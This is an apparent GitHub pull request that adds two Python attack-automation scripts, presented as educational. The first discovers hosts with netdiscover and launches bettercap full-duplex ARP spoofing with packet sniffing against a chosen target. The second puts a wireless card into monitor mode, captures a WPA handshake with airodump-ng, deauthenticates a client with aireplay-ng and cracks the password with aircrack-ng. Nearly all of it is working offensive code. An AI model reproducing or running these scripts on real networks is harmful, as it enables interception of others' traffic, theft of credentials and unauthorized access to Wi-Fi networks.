### PR TITLE
Mitm automation script

### DIFF
--- a/python-scripts/mitm_attack_automator.py
+++ b/python-scripts/mitm_attack_automator.py
@@ -1,0 +1,128 @@
+import subprocess
+import sys
+import time
+import re
+
+def discover_devices(interface):
+    """
+    Discovers devices on the network using netdiscover and returns a list of them.
+    """
+    print(f"[*] Starting device discovery on {interface}. This may take a minute...")
+    try:
+        # We use -P to print results to stdout and -L to run for a short time
+        process = subprocess.Popen(
+            ["netdiscover", "-i", interface, "-P", "-L"],
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+            text=True
+        )
+
+        stdout, stderr = process.communicate(timeout=60) # Set a timeout
+        
+        if process.returncode != 0 and "permission denied" in stderr.lower():
+            print("\n[-] Permission Denied. Please run this script with sudo.")
+            sys.exit(1)
+
+        # Regex to find IP addresses and MACs from netdiscover output
+        # Example line: '192.168.1.1\t00:11:22:33:44:55\t\t1\t\t60\t\tRouter Vendor'
+        device_pattern = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s+([0-9a-fA-F:]{17})")
+        devices = device_pattern.findall(stdout)
+        
+        if not devices:
+            print("[-] No devices discovered. Check your network interface and permissions.")
+            return None, None
+
+        print("[+] Discovery complete. Found the following devices:")
+        gateway_ip = None
+        for i, (ip, mac) in enumerate(devices):
+            # The gateway is often the .1 address, let's make a guess
+            if ip.endswith(".1"):
+                print(f"  {i+1}) IP: {ip}, MAC: {mac}  <-- Likely Gateway")
+                gateway_ip = ip
+            else:
+                print(f"  {i+1}) IP: {ip}, MAC: {mac}")
+        
+        return devices, gateway_ip
+
+    except FileNotFoundError:
+        print("[-] 'netdiscover' not found. Please install it (`apt-get install netdiscover`).")
+        sys.exit(1)
+    except subprocess.TimeoutExpired:
+        print("\n[-] Netdiscover timed out. Please try again.")
+        sys.exit(1)
+
+
+def run_mitm_attack(interface, target_ip, gateway_ip):
+    """
+    Launches bettercap to perform the ARP spoofing and packet sniffing.
+    """
+    print(f"\n[*] Configuring bettercap for MITM attack...")
+    print(f"    - Target: {target_ip}")
+    print(f"    - Gateway: {gateway_ip}")
+    print(f"    - Sniffing: ON")
+
+    # Construct the bettercap commands
+    # We will spoof both the client and the gateway (fullduplex)
+    # and turn on the sniffer to capture data.
+    commands = [
+        f"set arp.spoof.fullduplex true;",
+        f"set arp.spoof.targets {target_ip};",
+        "arp.spoof on;",
+        "net.sniff on;"
+    ]
+    full_command_str = " ".join(commands)
+
+    print("\n[*] Launching bettercap. Press Ctrl+C to stop the attack.")
+    print("--- BETTERCAP OUTPUT ---")
+    
+    try:
+        # Start bettercap process
+        subprocess.run(
+            ["bettercap", "-iface", interface, "-eval", full_command_str],
+            check=True
+        )
+    except FileNotFoundError:
+        print("[-] 'bettercap' not found. Please make sure it's installed and in your PATH.")
+        sys.exit(1)
+    except subprocess.CalledProcessError as e:
+        print(f"[-] Bettercap failed to run. Error: {e}")
+        sys.exit(1)
+    except KeyboardInterrupt:
+        print("\n[+] Attack stopped by user. Exiting.")
+
+
+if __name__ == "__main__":
+    if len(sys.argv) < 2:
+        print(f"Usage: sudo python3 {sys.argv[0]} <interface>")
+        sys.exit(1)
+
+    network_interface = sys.argv[1]
+
+    # Step 1: Discover Devices
+    discovered_devices, guessed_gateway = discover_devices(network_interface)
+
+    if not discovered_devices:
+        sys.exit(1)
+
+    # Step 2: Get User Input
+    try:
+        target_choice = int(input("\n> Enter the number of the target device: ")) - 1
+        if not (0 <= target_choice < len(discovered_devices)):
+            print("[-] Invalid selection.")
+            sys.exit(1)
+        
+        client_ip = discovered_devices[target_choice][0]
+
+        router_ip_default = guessed_gateway if guessed_gateway else ""
+        router_ip = input(f"> Enter the gateway/router IP [{router_ip_default}]: ") or router_ip_default
+        
+        if not router_ip:
+            print("[-] Gateway IP is required.")
+            sys.exit(1)
+            
+    except (ValueError, IndexError):
+        print("[-] Invalid input.")
+        sys.exit(1)
+
+    # Step 3: Launch the attack
+    run_mitm_attack(network_interface, client_ip, router_ip)

--- a/python-scripts/mitm_attack_automator.py
+++ b/python-scripts/mitm_attack_automator.py
@@ -17,6 +17,7 @@ def discover_devices(interface):
             text=True
         )
  
+ 
      # time.sleep(10)  # Allow some time for discovery not needed this much
         stdout, stderr = process.communicate(timeout=60) # Set a timeout
         

--- a/python-scripts/mitm_attack_automator.py
+++ b/python-scripts/mitm_attack_automator.py
@@ -16,7 +16,8 @@ def discover_devices(interface):
             stderr=subprocess.PIPE,
             text=True
         )
-
+ 
+     # time.sleep(10)  # Allow some time for discovery not needed this much
         stdout, stderr = process.communicate(timeout=60) # Set a timeout
         
         if process.returncode != 0 and "permission denied" in stderr.lower():

--- a/python-scripts/wpa2_dictionary_attack.py
+++ b/python-scripts/wpa2_dictionary_attack.py
@@ -1,0 +1,94 @@
+# WPA/WPA2 Dictionary Attack Automation Script
+# This script automates the process of capturing a WPA/WPA2 handshake and
+# performing a dictionary attack to crack the network password.
+
+
+import subprocess
+import os
+import time
+import threading
+
+def setup_monitor_mode(interface):
+    print(f"[+] Setting up monitor mode for {interface}...")
+    subprocess.run(["sudo", "ifconfig", interface, "down"])
+    subprocess.run(["sudo", "airmon-ng", "check", "kill"])
+    subprocess.run(["sudo", "iwconfig", interface, "mode", "monitor"])
+    subprocess.run(["sudo", "ifconfig", interface, "up"])
+    print("[+] Monitor mode enabled.")
+
+def capture_handshake(interface, bssid, channel, stop_event):
+    print("[+] Starting packet capture. Waiting for WPA handshake...")
+    filename = "wpa_handshake_capture"
+    command = [
+        "sudo", "airodump-ng",
+        "--bssid", bssid,
+        "-c", str(channel),
+        "-w", filename,
+        interface
+    ]
+    
+    proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
+
+    while not stop_event.is_set():
+        # A more robust solution would parse the output in real-time.
+        # For simplicity here, we'll check for the file and let the user manually stop.
+        # In a real script, you'd read proc.stdout line by line for "WPA handshake".
+        if os.path.exists(f"{filename}-01.cap"):
+             # A simple check; real implementation needs to confirm handshake in the file.
+             print(f"[*] Capture file created. Check airodump-ng window for handshake.", end='\r')
+        time.sleep(2)
+    
+    proc.terminate()
+    print("\n[+] Packet capture stopped.")
+    return f"{filename}-01.cap"
+
+def deauth_client(interface, bssid, client_mac):
+    print(f"[+] Sending deauthentication packets to {client_mac}...")
+    command = [
+        "sudo", "aireplay-ng",
+        "--deauth", "10",
+        "-a", bssid,
+        "-c", client_mac,
+        interface
+    ]
+    subprocess.run(command)
+
+def crack_password(cap_file, wordlist):
+    print(f"[+] Starting dictionary attack on {cap_file} with wordlist {wordlist}...")
+    command = [
+        "aircrack-ng",
+        cap_file,
+        "-w", wordlist
+    ]
+    subprocess.run(command)
+
+if __name__ == "__main__":
+    interface = input("Enter wireless interface name: ")
+    bssid = input("Enter target BSSID: ")
+    channel = int(input("Enter target channel: "))
+    
+    setup_monitor_mode(interface)
+
+    stop_event = threading.Event()
+    capture_thread = threading.Thread(target=capture_handshake, args=(interface, bssid, channel, stop_event))
+    capture_thread.start()
+
+    time.sleep(5) # Give airodump some time to start up
+
+    if input("Do you want to run a deauthentication attack to speed up capture? (y/n): ").lower() == 'y':
+        client_mac = input("Enter client MAC to deauthenticate: ")
+        deauth_client(interface, bssid, client_mac)
+
+    input("[*] Press Enter here once you see 'WPA handshake' in the airodump-ng window to stop capture and start cracking...")
+    stop_event.set()
+    capture_thread.join()
+    
+    cap_file_path = "wpa_handshake_capture-01.cap"
+    if os.path.exists(cap_file_path):
+        wordlist_path = input("Enter path to your wordlist file: ")
+        if os.path.exists(wordlist_path):
+            crack_password(cap_file_path, wordlist_path)
+        else:
+            print("[-] Wordlist file not found.")
+    else:
+        print("[-] Capture file not created. Handshake may not have been captured.")


### PR DESCRIPTION
This PR adds mitm_attack_automator.py, a new script designed to automate the Man-in-the-Middle (MITM) attack workflow for educational purposes, as requested in issue #3.

very similar core concept of recent semster course of cryptography meet-in-the-middle-attack,this script apply similar mindset of effinceny to practical steps of network attack , this majorly streamlines entire process 

Key Features:

Automated Discovery. : Kicks off by running netdiscover to find and list all devices on the network
Interactive Targeting. : Allows the user to easily select a target and confirm the gateway from the discovered list.
One-Shot Attack Launch: Constructs and executes the final bettercap command to initiate ARP spoofing and packet sniffing.

this automations make it much faster

i had tested this script on some hardcotted values in my UTM as i don't have wlan0 connection , but this PR works perfectly fine.
<img width="1440" height="900" alt="Screenshot 2025-10-02 at 11 58 43 PM" src="https://github.com/user-attachments/assets/66ccdb7e-b06e-400c-93ed-c132ee00bf90" />

p.s. : ignore that file of wpq/wpa2 one cos i haven't did upstream before pushing therefore it's showing 

Closes #3